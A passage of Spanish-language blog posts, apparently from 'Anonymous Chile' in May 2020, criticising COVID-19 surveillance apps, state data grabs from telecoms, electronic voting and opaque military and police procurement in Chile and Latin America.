Una clara distinción debe trazarse -aunque a veces sea difícil de establecer- entre la “vigilancia de la expansión del virus” y la “vigilancia de las personas” que resultan ser portadoras de este. ¿Y por qué esto es importante? Lo es desde la perspectiva de la proporcionalidad en el diseño, pues la información a la que se deba tener acceso excepcional, en relación con las reglas generales de privacidad, debe minimizarse a aquello que científicamente sea razonable para frenar la expansión del virus, pero no para generar un recuento exhaustivo de las vidas de los pacientes y su círculo de contactos. Debe tratarse de un sistema de vigilancia epidemiológico, con base científica sólida, no de la implementación de un sistema de control de la autonomía de los ciudadanos que permita ser fácilmente reconducido a otros propósitos de control social con posterioridad.

Es por ello que no es posible generar una autorización excepcional de acceso y uso a datos personales sin clara visibilidad de los criterios predictivos que se usarán para obtener modelos de intervención a partir de los datos a los que se quiere tener acceso. Ello porque sin tener acceso a esa caja negra no existe forma de entender la equidad (o falta de ella) subyacente a la adecuación de la herramienta, o poder pronunciarse acerca de la legitimidad de la intervención en función de la proporcionalidad de la afectación que significa un acceso irrestricto a bases de datos personales y datos sensibles de todos los ciudadanos.

De larga data es el reconocimiento de que los derechos fundamentales no se plantean como imperativos absolutos, pero si como ejercicios de ponderación, y de ahí la necesidad de que cualquier restricción que se adopte a su ejercicio sea proporcionada y no afecte la esencia del ejercicio del derecho restringido. Ese trade-off requiere de salvaguardias en su autorización de limitación de ejercicio que se contengan en normas de carácter legal, ya que este es el instrumento democrático que permite balancear con transparencia los distintos derechos en juego.

Así, una legislación de emergencia en el contexto de COVID-19 que busque una autorización extraordinaria para que a través del uso de tecnologías se pueda acceder a datos sensibles de salud de las personas (condición de encontrarse infectado de COVID-19, síntomas, monitoreo de tratamiento, entre otros) o de datos personales (información de geolocalización, contactos próximos, agenda de contacto en dispositivos, entre otros) en manos de diferentes servicios públicos o proveedores privados, requeriría de los siguientes componentes:

  • Caracterizar en forma estricta la situación de emergencia y/o el plazo que habilita acceder a los datos personales y sensibles de salud en manos de los distintos órganos del Estado.
  • Especificar quiénes estarán a cargo del acceso extraordinario a tales datos.
  • Detallar cuáles son y cómo se utilizarán los datos a los cuales se solicita acceso extraordinario.
  • Establecer provisiones de término del acceso y uso extraordinario a los datos con medidas efectivas de control de acceso o eliminación, en su caso.
  • Ordenar medidas específicas de seguridad operacional para evitar acceso y uso malicioso de los datos.
  • Establecer mecanismos de control externo y rendición de cuentas que permita fiscalizar y sancionar fuertemente la desviación de finalidad en el acceso y uso de los datos. Esto último en particular para proteger a los titulares de los datos personales y sensibles de salud de futuras discriminaciones arbitrarias en materia laboral, de salud, previsión o beneficios sociales, ya sea por el Estado o por agentes privados, por haber sido portadoras de COVID-19.

El uso de los datos asociados a la expansión de la pandemia COVID-19 debiera hacerse bajo técnicas de pseudonimización o disociación (con algoritmos de anonimización suficientemente robustos) cuando se trate de ofrecer información públicamente disponible, además de tener la seguridad como requisito indispensable, incluyendo el tránsito cifrado de la información y su almacenamiento seguro y resiliente.

La rápida acción para enfrentar la expansión del COVID-19 requiere de medidas excepcionales, pero no pueden llevarse a cabo violando los pilares de un Estado democrático regido por la regla de derecho. El combate de una pandemia no es ni puede ser antónimo del respeto de derechos fundamentales, ni la puerta al autoritarismo del que nuestro continente ha luchado tan duro por escapar.

Las malas ideas siguen siendo malas en tiempos de pandemia y este es un mal momento para experimentar con los derechos fundamentales que tanto vamos a necesitar cuando la emergencia pase, para construir sociedades más justas y solidarias que nos permitan superar las deficiencias estructurales que exacerban las inequidades de nuestra región. De esta salimos todos juntos y con nuestros derechos intactos.

Epidemia y espionaje gubernamental en Latinoamerica

Publicada el 14/05/2020 - 02/08/2021 por Anonymous Chile

Incontables iniciativas estatales y privadas pretenden proveer de soluciones a la expansión del Coronavirus, incluso en América Latina. A pesar de los llamados a la cordura y al respeto por los derechos fundamentales, persiste en nuestra región un intento por usar la vigilancia como solución, inclusive para problemas que van más allá de la salud pública. ¿Sobreviviremos al brote de vigilancia?

Desde hace semanas, hemos visto cómo gobiernos mundiales, incluidos los de América Latina, han comenzado a utilizar información de teléfonos móviles y de aplicaciones para teléfonos móviles con el propósito de controlar la expansión de COVID-19 en sus países, fundamentalmente a través de aplicaciones para smartphones. Aunque muchos de los esfuerzos gubernamentales coinciden en carecer de suficiente legitimación y de resguardos de derechos fundamentales, el pánico aparente se convierte en el caldo de cultivo para medidas inidóneas y abusivas.

En un contexto de emergencia global, el problema que surge no es una cuestión solamente del respeto a los derechos en una situación excepcional, sino también del riesgo que significa mantener esa excepcionalidad para el ejercicio de derechos fundamentales a lo largo del tiempo.

El poder sanador de los datos personales

Una tradicional expresión de la vigilancia estatal es la relativa al seguimiento de personas en sus movimientos y en sus comunicaciones, con las tecnologías de comunicación (y en particular, las digitales) como vía principal para la observación estatal. En un contexto donde resulta conveniente hacer el seguimiento de personas específicas o de grupos numerosos para trazar rutas de contagio o medir situaciones de riesgo, aparecen estas tecnologías como un mecanismo en apariencia idóneo. Varias medidas estatales reflejan esa intuición.

La proliferación de aplicaciones móviles para la pandemia, especialmente a nivel gubernamental, son una muestra básica de esta pretensión. En el caso de las de nuestra región, tanto el rastreo como la entrega de información para el autodiagnóstico de síntomas asociados a Coronavirus parecen objetivos de política pública razonables para una crisis de salud. Sin embargo, un examen apenas superficial permite encontrar incontables puntos de duda: cómo se anonimizará y agregará la información para no identificar individuos, quién tiene acceso a la información, cómo será utilizada (y en contraste con qué otros datos), por cuánto tiempo y bajo qué condiciones se almacenará, etcétera.

Su utilidad en relación con sus niveles de penetración, en tanto, son todavía un misterio

Como era de esperarse, una situación de crisis para los gobiernos constituye una enorme oportunidad para quienes quieren vender soluciones. Esto es especialmente notorio en el caso de la tecnología, donde cada vendedor ajusta su oferta para convertirla en solución. Es el caso de NSO Group, compañía de tecnologías para la vigilancia, que comenzó a ofrecer y a probar sus capacidades de vigilancia para hacer el seguimiento de personas contagiadas y de las que por estar en contacto con ellas fueran susceptibles al contagio, a partir del cruce de información de dispositivos y de redes de comunicación. Es decir, convirtiendo en una situación deseable parte de la tecnología que ha sido usada incluso en nuestra región, para espiar a periodistas y activistas en México. Además de la falta de credibilidad de oferentes así, ¿cómo puede garantizarse que la información no se usará con otros fines ni más allá de la emergencia actual?

Fue en la Ciudad de México donde el anuncio de implementación de georreferenciación de telefonía móvil para monitorear movimiento y contacto y controlar el aislamiento social. Como señala R3D, otras autoridades estatales dirigen solicitudes de información a las empresas de telecomunicaciones, sin condición alguna de transparencia para medir su cumplimiento de los estándares de derechos humanos y de la legislación nacional.

En sentido similar, hemos hecho mención al caso de Ecuador, donde se ha dispuesto el uso de “plataformas satelitales y de telefonía móvil” para el control de movimiento de la población bajo aislamiento y cuarentena. A pesar de la preocupación de la sociedad civil a nivel regional y global por la necesidad de resguardos explícitos, en un país donde todavía no existe siquiera una ley de protección de datos personales, la medida de aparente carácter excepcional parece haber seguido su curso, aun cuando Ecuador sigue siendo uno de los países más afectados en número total y proporcional de casos fatales en la región.

En el caso de Brasil, aun cuando por su carácter federal han sido varios los estados que han tomado medidas de prevención y de seguimiento, incluyendo mediante órdenes de aislamiento y del recurso a datos de empresas de telecomunicaciones, la ausencia de órdenes a nivel nacional ha sido patente, y ha estado marcada por el liderazgo temerario del actual presidente de la unión. Una situación particularmente preocupante en atención a que Brasil mantiene el número más alto de contagios en la región. A la anticipada postergación de la entrada en vigor de la Ley General de Datos Personales, se sumó otra preocupación: hace semanas, se hizo público el acuerdo entre empresas de telecomunicaciones y el Ministerio de Ciencia, Tecnología, Innovación y Comunicación, para facilitar información sobre teléfonos móviles relativas a ubicación geográfica y movilización. Días después, tal acuerdo fue rescindido por el presidente Bolsonaro, no necesariamente por preocupaciones sobre los datos personales, como por su actitud temeraria frente a la pandemia. No obstante, los estados conservan capacidad –y más importante, voluntad– para acordar tales usos, como ocurre con los populosos San Pablo y Río de Janeiro.

Otras medidas son aun menos sofisticadas, y pueden igualmente derivar en recolección de información personal. Así, por ejemplo, aplicaciones como el número de WhatsApp dispuesto por el gobierno argentino para recibir consultas facilitando el autoexamen, permiten a la vez identificar números telefónicos y por esa vía a las personas que buscan esa información.

Sea que se trate de georreferenciación mediante antenas de telefonía celular, mediante GPS, mediante señal de WiFi o mediante la entrega voluntaria de información del lugar de cuarentena, resulta al menos cuestionable su real efectividad, en la medida en que no es tanto el rastreo como lo son el aislamiento y las medidas de contención las medidas mejor convocadas a la prevención. Es necesaria en cualquier caso una mayor precisión de la información generada –junto a todos los resguardos latamente reiterados– para que ella tenga real capacidad preventiva e informativa en torno a posibles focos de contagio. De lo contrario, la información agregada y anonimizada es la que mejor serviría a la toma de decisiones, también en tal caso bajo resguardos serios, y sin por ello ser por sí sola información suficiente.

Síntomas de un problema mayor: el control social

Al creciente listado de corona-apps presentes en América Latina se ha sumado más recientemente la anunciada aplicación CoronApp del gobierno de Chile. Como otras, permite el autoexamen y la entrega de información, y permite asimismo registrar el lugar de cuarentena, aun cuando no entrega información de proximidad con personas infectadas. Pero agrega una funcionalidad que varios estados de la región han convertido también en una prioridad: la vigilancia mutua y el control social, más allá de los contagios.

En el caso de la CoronApp chilena, existe una funcionalidad específica para “informar y/o denunciar conductas o eventos de alto riesgo”, esto es, para acusar a la autoridad (en teoría, el Ministerio de Salud) que se están presenciando eventos de aglomeración de personas, incumplimiento de las cuarentenas obligatorias, o existencia de filas para servicios. Es fácil adivinar que esta función puede servir para actos de revancha o enemistad social, quizás empeorando la distancia que ya se ha vuelto costumbre entre personas que comparten áreas con alta densidad demográfica, invocando tal vez innecesariamente a autoridades ya sobreexigidas por una crisis sanitaria global.

Tampoco se trata de una medida de control única. Así, Río de Janeiro controla aglomeraciones mediante denuncias telefónicas y mediante WhatsApp, además de servirse de información de telefonía móvil, y desde esta semana del uso de drones para seguir movimientos de personas y dirigirse a ellas por altoparlante. En tanto, en sentido similar, Argentina ha dispuesto diversos mecanismos de denuncia, incluida una línea telefónica para denunciar infracciones del aislamiento físico. Así, la irresponsabilidad de las personas que insisten en romper situaciones de cuarentena pasa a ser una preocupación adicional de quienes sí la respetan, una fuente de desconfianza social, y una motivación para el control mutuo.

Otro nivel de control que toma como excusa a la pandemia es el realizado por el estado argentino, en el denominado ciberpatrullaje, consistente en la revisión de la discusión en redes sociales “para la prevención de delitos promovidos según el ‘humor social’”. Si bien se trata a menudo de discusiones al alcance del público, esta acción de vigilancia estatal, de no ser transparente y sujeta a protocolos de ejercicio y de control, puede además de ser arbitraria impactar negativamente en las personas, incitando a la autocensura. En ausencia de resguardos sobre su procedencia y su supervisión, puede ser también una forma de vigilancia masiva contraria a los derechos humanos. Y nos recuerda a la vez al uso para el control social que el gobierno de Chile ha dado en un contexto de crispación social, poniendo en entredicho su relevancia como parte de medidas relativas a una crisis sanitaria.

Contra los brotes de vigilancia en la región

Recolectar y procesar información sensible de las personas, como es la relativa a su condición de salud y a sus movimientos corporales, constituye una acción intrínsecamente riesgosa para las titulares de esos datos. Pero en lo relativo a aplicaciones, existen principios que pueden aplicarse para prevenir buena parte de ese daño. Sin ir más lejos, ya existen agrupaciones y comunidades de investigación dedicados al desarrollo de aplicaciones y protocolos de seguimiento respetuosos con la privacidad, y cabe a los gobiernos tanto hacer eco de las preocupaciones de la sociedad civil como recoger y apoyar tales iniciativas. Los requerimientos delineados por el Chaos Computer Club para las aplicaciones son un punto de partida crucial para ese desarrollo.

Por cierto, el desarrollo tecnológico por si solo está condicionado por factores sociales, incluyendo los normativos, que sirven como garantía al respeto a los derechos fundamentales. De otro modo, es también posible recurrir a legislación de emergencia no para facilitar la acción del estado vigilante, sino para asegurar el pleno respeto de los derechos de las personas afectados por la recolección y uso de su información personal. Además de ese rol protector, la regulación puede así procurar la prevención de que el estado de excepción se convierta en el de normalidad, y que la vigilancia pueda extenderse mucho más allá de la emergencia actual, incluso con aprobación popular producto de una distorsionada percepción de la realidad.

Pero además del deber de discutir apropiadamente cómo utilizar la tecnología que involucra vigilancia, es relevante discutir también el porqué. ¿Por qué es la vigilancia una posibilidad de acción percibida como “necesaria”, cuando ni siquiera su carácter de conveniente es inconcuso? ¿Por qué justificar, y finalmente normalizar, que bajo ciertas condiciones sea aceptable monitorear nuestras expresiones, o llenar nuestros cuerpos, hogares y poblados con cámaras, georreferenciación, reconocimiento facial, detección de calor, reportes voluntarios de salud, y más? El no despliegue de la acción vigilante del Estado es también una opción, especialmente de cara a los riesgos involucrados y de la existencia de medidas de salud pública con un impacto comprobadamente mayor. Insistir en soluciones tecnológicas puede llevarnos a eludir discusiones más profundas sobre fallas sistémicas que no son causadas por virus o desastres naturales, sino por decisiones políticas sobre la organización de la economía y de la vida en sociedad.

Estado Mayor Conjunto subcontrató empresas israelíes y americanas para ciberdefensa nacional

Publicada el 13/05/2020 - 02/08/2021 por Anonymous Chile

En diciembre de 2018 la compañía de telecomunicaciones Entel se adjudicó la licitación para implementar el sistema de ciberseguridad de las Fuerzas Armadas. Según información preliminar, la empresa además subcontrató los servicios de dos firmas extranjeras.

El 21 de diciembre de 2018 el Estado Mayor Conjunto (Emco), organización dependiente del Ministerio de Defensa que agrupa a todas las ramas de las Fuerzas Armadas, adjudicó a la empresa de telecomunicaciones Entel por seis millones de dólares el desarrollo de la primera etapa del Proyecto Marciano, iniciativa que busca implementar un sistema de ciberdefensa para el área de Defensa Nacional. Esta información fue revelada en septiembre de 2019.

Tanto la licitación como el desarrollo de este proyecto son de carácter secreto. En este contexto, investigaciones extras han arrojado un nuevo antecedente: para la implementación de esta primera etapa del Proyecto Marciano, Entel habría subcontratado a FireEye y BLER Security, empresas privadas de seguridad de Estados Unidos e Israel, respectivamente.

FireEye

De la compañía estadounidense se requirió su producto inSIGHT Threat Intelligence, el cual alerta al usuario de las amenazas para su seguridad, ya sean de ciberespionaje, delitos cibernéticos y hacktivismo, sea en la red oficial, que usamos la mayoría de las personas, o en la llamada “dark web”, un reducto reservado por especialistas informáticos, hackers y agentes de ciberseguridad de distintos estados.

En su página web, FireEye comenta que el servicio cuenta con “más de 150 investigadores y analistas de inteligencia en más de 20 países vigilando nuevos ataques y tecnologías, y las motivaciones detrás de estos”. Además, cerca de 300 analistas recopilan información obtenida de las víctimas de ataques para que sirvan de insumo para quienes utilicen la plataforma. Junto con esto, FireEye recopila inteligencia artificial de más de 16 millones de sensores mecánicos y plataformas de recolección de inteligencia.

FireEye es una compañía fundada en 2004 en el estado de California. Su director ejecutivo es Kevin Mandia, quien en el pasado fue oficial de seguridad informática en el Séptimo Grupo de Comunicaciones del Pentágono y agente especial de la Unidad de Investigaciones Especiales de la Fuerza Aérea.

La empresa ha obtenido varias distinciones. Por ejemplo, en 2019 ganó el título a la mejor compañía de ciberseguridad de Norteamérica, galardón entregado por la comunidad en línea Cybersecurity Insiders.

Como dato anecdótico, en 2014 el ex director ejecutivo de FireEye, David de Walt, declaró al Financial Times que la compañía se vio altamente beneficiada en lo económico con las múltiples revelaciones hechas por el ex agente de inteligencia estadounidense, Edward Snowden, respecto del espionaje del gobierno a distintas personas, gobiernos y empresas en el mundo.

BLER Security

En tanto, el servicio entregado por la empresa israelí para el proyecto de ciberdefensa que realiza Entel, lleva por nombre Target Profiler SAAS Services.

Según menciona la compañía este servicio ”es un sistema que recopila información sobre el sospechoso objetivo de las redes sociales y aplicaciones web, generando un perfil objetivo preciso a partir de información básica”.

Su funcionamiento permite al usuario realizar búsquedas resguardando el anonimato e ir perfilando al investigado y sus movimientos, para de esta forma ir determinando posibles amenazas. En este caso, el Estado Mayor Conjunto necesitaría tan solo el número telefónico de una persona para que el servicio de BLER Security rastree los movimientos en redes sociales del objetivo, incluyendo lugares como la Dark Web.

BLER Security es una compañía de cerca de 30 empleados fundada en 2014, que funciona con capitales de la empresa de Defensa Avnon Group. La marca que ahora prestará servicios para el Estado Mayor Conjunto en Chile, además tiene como cliente a la policía de Israel.

Los dueños son Efim Lerne y Uri Boros, este último, ex oficial de Inteligencia de la Fuerza Aérea de Israel.

Un proyecto polémico

La implementación del Proyecto Marciano comenzó con un conflicto judicial con la empresa Pegasus, que participó en la licitación y acusó al Estado Mayor Conjunto de irregularidades en el proceso que habrían beneficiado a Entel. Sin embargo, esta acción de la compañía no ha prosperado en tribunales.

Uno de los puntos más llamativos de la contratación de Entel es el nexo de esta empresa con el sector de Defensa en Perú, hechos que revelados en septiembre de 2019, y que dieron cuenta de que la empresa de telecomunicaciones en 2019 suscribió contratos con distintos organismos uniformados del país vecino por cerca de 1,3 millones de dólares.

En relación a esto último, en diciembre del año pasado El Periodista informó de los nexos de Alexis Narbona, quien participó en la licitación del Proyecto Marciano, con la filial peruana de Entel.

En relación a la contratación de los servicios de FireEye y BLER Security, un experto en sistemas dijo que el hecho de que “la solución de ciberseguridad del Estado Mayor Conjunto pasará por Entel, empresas israelíes y estadounidenses, implica que todo el mundo va a saber virtualmente sobre la ciberseguridad chilena, y esa información se venderá al mejor postor”.

Se intentó contactar a Emco para tener una confirmación oficial de la subcontratación de estos servicios, y la respuesta fue una suerte de amenaza.

“El Proyecto Marciano consiste en un sistema de Ciberdefensa que integra redes computacionales, cuyo propósito es crear enlaces de colaboración entre los organismos de las FF.AA., apoyando en la gestión y solución de incidentes informáticos, que puedan afectar a las redes institucionales de la Defensa Nacional. El desarrollo, equipamiento y alcances del Proyecto Marciano están clasificados como secretos, por lo que entregar o difundir información acerca de él, podría constituir un delito contra la Seguridad Nacional, por lo que el Estado Mayor Conjunto se reserva el derecho de ejercer las acciones legales pertinentes, acorde a las materias clasificadas que se publiquen”.

Representantes de Entel declinaron referirse al tema, argumentando que el contrato con las Fuerzas Armadas los somete a confidencialidad.

Los algoritmos no salvarán la democracia

Publicada el 12/05/2020 - 02/08/2021 por Anonymous Chile

La implementación de un sistema de votación electrónica crea oportunidades artificiales para manipular los resultados de una elección sin dejar trazas, genera mecanismos de caja negra y creando una barrera insalvable entre el elector y el sistema de elecciones

En una columna de opinión publicada en La Tercera el martes 14 de febrero, el Presidente de la ACTI, Thierry De Saint Pierre, hace una intensa defensa de la utilización del voto electrónico. Entre otros beneficios, De Saint Pierre destaca los bajos costos involucrados en un proceso digital, la rapidez con la que es posible implementarlo y un potencial aumento en los niveles de participación, considerando lo fácil que puede ser instaurar un proceso electrónico. Luego de explorar superficialmente algunas críticas, concluye que su adopción beneficiaría a la democracia y al país.

Pese al optimismo tecnológico que permea la columna, lo cierto es que cualquier análisis que cruce el conocimiento de la tecnología a aplicar con los requerimientos del voto en una democracia constitucional debiera llevarnos necesariamente a la conclusión contraria. Debiera llevarnos a concluir que la implementación de un sistema de votación electrónica compromete gravemente instituciones básicas de nuestra democracia representativa.

En la última década, hemos sabido de la exposición de datos personales de más de 50 millones de usuarios de Facebook, del acceso público a datos de más de 500 millones de clientes de hoteles Marriott, de datos sensibles de más de 143 millones de usuarios de Equifax (incluyendo identidad y números de tarjetas de crédito), entre muchos otros. A estas alturas del desarrollo tecnológico, hay relativo consenso entre expertos en seguridad informática de que no existen sistemas computacionales completamente seguros y que no estén expuestos a ser eventualmente vandalizados. No existen razones para pensar que los sistemas de voto electrónicos se encuentran ajenos a esta realidad.

Adicionalmente, durante los últimos años hemos visto como alrededor del mundo tristemente tambalean algunas nociones básicas de la democracia constitucional moderna. Desigualdad estructural, populismo, campañas de desinformación, polarización política, viralización y masificación de contenido xenófobo y violento hacia minorías gracias al modelo de negocio publicitario de las redes sociales, entre otras plataformas, son algunos de los desafíos que hoy nuestra democracia debe enfrentar con urgencia y decisión. La implementación del voto electrónico no ayuda a superar ninguno de ellos y, por el contrario, crea nueva amenaza que nadie parece necesitar.

La implementación de un proceso de votación electrónica supone la privatización del proceso electoral, desechando la confianza que depositamos en las instituciones públicas para garantizar la idoneidad de los procesos y resultados electorales. La creación de intermediarios privados -en procesos de esta complejidad e importancia- supone la creación de inéditas zonas de incertidumbre, falta de control e inseguridad para procesos que suelen estar fuertemente regulados con el fin de asegurar dicha confianza.

Así, la implementación de un sistema de votación electrónica crea oportunidades artificiales para manipular los resultados de una elección sin dejar trazas, genera mecanismos de caja negra que los hace imposible de fiscalizar y finalmente crea una barrera insalvable entre el elector y el sistema de elecciones: un algoritmo invisible, implacable y fuertemente protegido por propiedad intelectual. Una barrera definitoria para el resultado de una elección y ajena a todo escrutinio público.

A diferencia de las conclusiones a las que llega el señor De Saint Pierre, un oído atento a los reclamos de la ciudadanía debiera concluir que lo que Chile necesita es una mejor democracia, más representativa, y que promueva diversidad y mayor participación. Pese a lo que el utopismo digital pueda aspirar, la única forma de lograrlo es a través de mecanismos más participativos, abiertos y fiscalizables. Es decir, con más política, con más democracia, no con más algoritmos y buenos deseos.

Llegó el momento en que las ISP chilenas deben proteger a sus usuarios

Publicada el 12/05/2020 - 02/08/2021 por Anonymous Chile

Tras las movilizaciones sociales del año pasado, la Fiscalía de Chile -a través de la Brigada de Investigaciones Policiales Especiales- ha incurrido en prácticas que resultan invasivas a través de medidas que, además de no cumplir la normativa vigente, vulneran los derechos de las personas afectadas.

Chile vive tiempos convulsionados desde el inicio del estallido social en octubre del año pasado. El punto más álgido de la revuelta, sin duda se produjo con la quema de varias estaciones del Metro de Santiago. Lo cierto es que a la fecha no sabemos quienes provocaron estos daños a la red subterránea y si se trató de un ataque coordinado. El gobierno -a pesar de no contar con ningún tipo de evidencia- ha puesto sobre la mesa la tesis de que se trata de un ataque motivado políticamente, organizado por grupos y gobiernos extranjeros.

En este contexto, el Ministerio Público ha echado mano a múltiples métodos investigativos y fuentes probatorias, desde peritajes respecto a los acelerantes utilizados a las grabaciones de cámaras apostadas en la cercanía de las estaciones. Sin embargo, la semana pasada los medios de comunicación dieron a conocer que la Fiscalía está buscando obtener pruebas a través de medios que no cumplen con la normativa vigente y que vulneran los derechos de los usuarios afectados.

El medio La Tercera dio a conocer que Fiscalía, a través de la Brigada de Investigaciones Policiales Especiales de la Policía de Investigaciones, solicitó a las distintas empresas de telefonía móvil del país la entrega de información relativa a la totalidad de números de telefonía móvil que se había conectado a ciertas antenas cercanas a la estaciones de metro afectadas, durante las horas en que ocurrieron los ataques.

¿Y la orden judicial?

Lo primero que llamó la atención e indignó a los usuarios, fue que parte de la información solicitada por Fiscalía fue entregada sin alguna orden judicial previa. Como consta en el relato de los medios, en primera instancia la Policía de Investigaciones solicitó a las compañías de telefonía la información sobre teléfonos conectados a las antenas presentando únicamente una instrucción del Fiscal a cargo de investigar la causa.

Ante ello, la mayoría de las empresas se negaron a entregar los antecedentes o los entregaron parcialmente, por tratarse de datos de carácter personal e información relativa a las comunicaciones privadas de sus clientes. Ante esta negativa, Fiscalía recurrió al 9no Juzgado de Garantía de Santiago y obtuvo una orden judicial autorizando la medida intrusiva. Una vez presentada la orden judicial, las empresas proveedoras de servicios de internet (ISP, por sus siglas en ingés) optaron por entregar la información solicitada. La única excepción fue WOM, que entregó los antecedentes solicitados sin requerir la presentación la orden judicial previa, es decir, únicamente con la instrucción del Fiscal de la causa.

Esto puede parecer una leguleyada, pero lo cierto es que es justamente en tiempos de crisis cuando el apegado al ordenamiento jurídico y las instituciones se pone realmente a prueba. Contar con una orden judicial previa es un requisito esencial e indispensable para poder autorizar diligencias de carácter intrusivo, que afecten, limiten o restrinjan el ejercicio del derecho a la protección de la vida privada y la inviolabilidad de las comunicaciones de los ciudadanos.

Estos requisitos, garantías y limitaciones no están establecidas en nuestro ordenamiento jurídico por mero capricho. Estas medidas buscan limitar la capacidad del poder político para entrometerse en la autonomía de los ciudadanos y evitar episodios de abuso de poder y vulneración de sus derechos, como vivimos recientemente en Chile con la llamada Operación Huracán.

Si bien este caso versa sobre información de las antenas telefónicas y los números conectados a ellas durante determinadas horas, es claro que esta información también entrega antecedentes respecto de la vida privada, las comunicaciones y el comportamiento de los clientes de las empresas telefónicas. De esta forma, el artículo 9 del Código Procesal Penal establece que “Toda actuación del procedimiento que privare al imputado o a un tercero del ejercicio de los derechos que la Constitución asegura, o lo restringiere o perturbare, requerirá de autorización judicial previa.”

En este sentido, resulta sumamente preocupante que la empresa WOM haya decidido entregar los antecedentes sin exigir el cumplimiento de los requisitos establecidos en el ordenamiento jurídico. Esta preocupación se hace más patente si tenemos en consideración que WOM fue una de las empresas mejor evaluadas en la versión 2019 de Quién Defiende Tus Datos, un informe que justamente busca medir hasta qué punto las empresas de telefonía e internet protegen la privacidad y los datos personales de sus usuarios. Es de esperar que durante el 2020 la empresa revise en profundidad la relación entre lo que expresan sus términos y condiciones y lo que efectivamente sucede cuando la autoridad requiere información de sus usuarios sin cumplir con los requisitos establecidos por la ley.

Incluso con orden judicial

La presentación de una orden judicial previa firmada por un Juez de Garantía es un requisito mínimo para entregar a la autoridad acceso a información relativa a las comunicaciones, la ubicación, conducta y los datos personales de los ciudadanos. Pero los jueces son seres humanos, susceptibles de equivocarse o dejarse presionar por las circunstancias políticas del momento.

En este caso, no corresponde que un Juez de Garantía autorice a la Fiscalía solicitar a las empresas de telefonía información respecto a todos los números de teléfono que se conectaron a las antenas de cierta zona a determinada hora. Como se ha señalado, las diligencias de vigilancia -y los objetivos de su ejecución- siempre deben cumplir con los principios de legalidad, necesidad, proporcionalidad y respeto a los derechos fundamentales.

De esta forma, las diligencias que buscan recolectar antecedentes sobre la ubicación, comportamiento y comunicaciones privadas de los ciudadanos siempre deben ser de carácter individual, no de carácter amplio, abstracto o colectivo. En otras palabras, el Juez de Garantía puede autorizar que en base a antecedentes concretos que acrediten una sospecha fundada sobre la participación de un individuo en la comisión de un delito grave y -en la medida que la diligencia sea imprescindible para la investigación- que se autorice una diligencia de estas características respecto de ese individuo en particular.

Lo que no corresponde es que una medida de estas características sea decretada de forma abstracta, afectando a cualquier persona que simplemente se encontraba en el lugar de los hechos o simplemente es un vecino del sector, respecto de los cuales no existen antecedentes concretos que justifiquen una intromisión de estas características.

Si bien las empresas de telecomunicaciones tienen un deber de cooperación hacia la autoridad en lo que respecta a investigaciones penales, también tienen un deber moral y legal hacia sus clientes, de mantener reserva de los datos sensibles y relativos a las comunicaciones que obren en su poder a propósito del servicio que prestan.

Este fue justamente uno de los parámetros que la versión 2019 de Quien Defiende Tus Datos buscó medir: hasta qué punto las empresas de telecomunicaciones están dispuestas a recurrir a tribunales o instancias administrativas para objetar instrucciones de la autoridad que no se ajustan a derecho. Durante el 2019 varias empresas se destacaron por objetar una solicitud desproporcionada de datos de sus clientes realizada por SUBTEL. Las empresas chilenas retrocedieron en su compromiso con sus clientes al no objetar judicialmente la solicitud de información de todos sus clientes que estaban conectados a las antenas cercanas al metro, es de esperar que durante el 2020 enmienden el camino y ante en nuevo episodio similar vuelvan a ponerse del lado de sus usuarios.

Carabineros invierte directamente para conectarse con el Registro Civil, a pesar de disponer de los medios para conseguirlo gratis

Publicada el 11/05/2020 - 02/08/2021 por Anonymous Chile

En diez años Ingeniería Solem S.A. ha recibido órdenes de compra directas por más de $1.200 millones, pese a que existen más proveedores, y una de las funciones contratadas puede hacerse usando dispositivos Simccar disponibles por la policía desde 2015.

El arribo de Mario Rozas Córdova a la cabeza de Carabineros a fines de 2018 fue una medida de emergencia ante el descrédito por el que atravesaba el entonces director Hermes Soto Isla, cuestionado por su actuar en el caso del asesinato de Camilo Catrillanca por parte de la institución que dirigía. Soto supuestamente había llegado a limpiar la imagen en medio de la crisis por el desfalco conocido como Pacogate, que ya suma cerca de $30 mil millones.

Rozas reemplazó a Soto, y debió seguir con esa misma tarea de limpieza; y hasta el momento, bajo su mandato, solo han existido críticas por las violaciones a los derechos humanos cometidas por la policía uniformada durante el estallido social, nada que tenga que ver con adquisiciones dudosas.

Sin embargo, una compra directa por $629 millones que salió en julio del año pasado en favor de la empresa Ingeniería Solem S.A., en plena gobernanza del actual general director, podría cambiar la agenda de Carabineros y volver la lupa sobre los dineros públicos confiados a la institución.

¿La razón? Buena parte del servicio contratado a la compañía puede ser obtenido de manera gratuita utilizando dispositivos de infraestructura tecnológica que ya posee Carabineros, a través de los conocidos equipos Simccar, empleados por los funcionarios en los controles de identidad, los que nada tienen que ver con Solem y que son arrendados por otro proveedor.

Al conocerse de esta operación millonaria, se indagó en los otros tratos directos alcanzados entre Carabineros y Solem, hallando un negocio que sigue un patrón que no se ha visto alterado a lo largo de diez años: pagar por un computador que hace la interconexión entre la institución y el Registro Civil.

Estos mismos antecedentes fueron cruzados con información consultada a la Policía de Investigaciones (PDI) y al propio Registro Civil, además de la obtención de los datos de una licitación realizada por Carabineros para arrendar el servicio de Sistemas Móviles de Consulta de Carabineros (Simccar).

El resultado arrojó que una parte de lo ofrecido por Solem, y por lo que ha recibido $1.200 millones en diez años, se pudo haber obtenido de manera gratuita, por lo que redunda como función y –lo que es peor– como pago. Un negocio redondo que ningún general director a lo largo de una década quiso poner fin, lo que incluye a Mario Rozas Córdova.

Solem y su comienzo con Carabineros

Solem fue fundada en 1991 como una sociedad de responsabilidad limitada. En septiembre de 2007 pasó a ser una sociedad anónima cerrada, donde quedaron como únicos socios –con un tercio de propiedad cada uno– Patricio Leixelard Solá, Víctor Macchiavello Alarcón y Jorge Guarello Wilhelmy, empresarios domiciliados en Viña del Mar. Un año después, en agosto 2008, se creó Excelsys Soluciones Centroamérica S.A., otra sociedad anónima domiciliada en Panamá donde figuran tanto Leixelard Solá como Guarello Wilhelmy como directores. Según el certificado de propiedad de Chile Proveedores, existe otro actor dentro de la estructura societaria de Solem.

